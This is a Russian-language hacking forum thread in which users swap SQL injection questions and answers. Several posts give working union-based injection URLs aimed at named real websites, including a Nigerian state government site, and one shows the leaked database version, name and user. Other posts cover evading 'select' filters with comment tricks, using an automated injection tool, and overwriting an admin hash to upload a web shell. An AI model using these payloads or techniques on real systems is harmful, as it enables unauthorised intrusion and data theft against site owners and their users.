Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,531
    Likes Received:
    1,250
    Reputations:
    274
    http://www.jigawastate.gov.ng/contentpage.php?id=-255'+/*!union+select*/+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,0+--+

    5.1.56:jigawa_jigawa:jigawa@localhost


    use google to translate this: КУРИ МАНУАЛЫ БЛЕАТЬ !11
     
    2 people like this.
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    как узнать сайты на серве, если хттпд конфиги не доступны?
     
    _________________________
  3. BLurpi^_^

    BLurpi^_^ Banned

    Joined:
    9 Feb 2011
    Messages:
    218
    Likes Received:
    26
    Reputations:
    9
    reverse-ip\открываешь индексный файл, ищешь нем строку, уникальную на твой взгляд и гуглишь в кавычках:)
     
    1 person likes this.
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    угу, да, еще можно заглянуть в скл базу, сайтов больше 20
    нужны именно варианты с конфигами
     
    _________________________
  5. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Code:
    http://www.oistbpl.com/groupinfo.php?show=-1+/*!union+select*/+1,2,3,4,5,6+--+
    Why is this showing 500 Internal Server Error?

    Haven't seen this before in SQL.
     
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,531
    Likes Received:
    1,250
    Reputations:
    274
    крути как слепую
     
  7. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    может стоить попробывать программой, типа хавиджа
     
  8. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    Либо неправильный синтаксис (где-нить в скуле не хватает скобок и т.п.) или юзается bind / execute
     
  9. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,582
    Likes Received:
    1,310
    Reputations:
    1,557
    kdiler, выкладывай ссылку.
     
  10. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,546
    Likes Received:
    173
    Reputations:
    75
    Подскажите, где на странице искать вывод?

    и тут
    чего ошибку выдаёт вместо вывода?
     
    #19430 qaz, 22 Feb 2012
    Last edited: 22 Feb 2012
  11. Expantano

    Expantano New Member

    Joined:
    5 Nov 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Всем доброго времени суток. Такой вопрос: можно ли загрузить файл на удаленный сервер, в папку у которой права 777 ? К примеру через curl_put , и если можно, покажите пример)
     
  12. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    qaz, первый еще смотрю. Во втором предполагаю, что нет доступа к information_schema.
    Expantano,
    Если есть на уд. сервере обработчик.
     
  13. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,546
    Likes Received:
    173
    Reputations:
    75
    такой вопрос, если в запросе при sql inj фильтруется ,,select,, как бить?
     
  14. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Пробуй обойти. /*!select*/, /*!SELeCT*/.
     
  15. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,531
    Likes Received:
    1,250
    Reputations:
    274
    а разве можно изменить данные в табле через иньекцию? тогда что мешает изменить хэш админа который не брутится на нужный нам? залей шелл..из шелла подрубись к БД----> профит
     
  16. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    в MySql так нельзя. В некоторых БД, например Ms Sql можно
     
  17. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    120
    Likes Received:
    34
    Reputations:
    55
    Через select нельзя обновить инфу в таблице, можно либо через сам update либо через insert в связке с on dublicate key update.
     
    1 person likes this.
  18. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,531
    Likes Received:
    1,250
    Reputations:
    274
    ну вообщето мой вопрос был реторическим..я прекрасно знаю чо можно в мелкософтной БД..но здесь речь о мускулебнужны спец условия для апдейта в мускуле
     
  19. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    830
    Likes Received:
    814
    Reputations:
    90
    qaz
    По поводу
    """
    http://www.mciti.ru/box.php?id=8+limit+0,0+union+select+1,table_name,3 ,4,5,6,7,8,9,10,11+from+information_schema.tables--+

    чего ошибку выдаёт вместо вывода?"""

    SELECT command denied to user 'gb_mciti'@'10.0.2.4' for table 'tables'

    Доступ запрещен, фильтрации там нет.
     
    _________________________
  20. Kapon

    Kapon New Member

    Joined:
    5 Feb 2012
    Messages:
    0
    Likes Received:
    3
    Reputations:
    0
    Извиняюсь вопрос может быть покажется глупым: просканил сайт сканер выдал ошибку:
    Возможно подключение к базе данных с помощью учетной записи "blablabla" собственно где эта база и как подключится к ней? Кто ответит пожизненый респект ресурс очень серьёзный))
     
Thread Status:
Not open for further replies.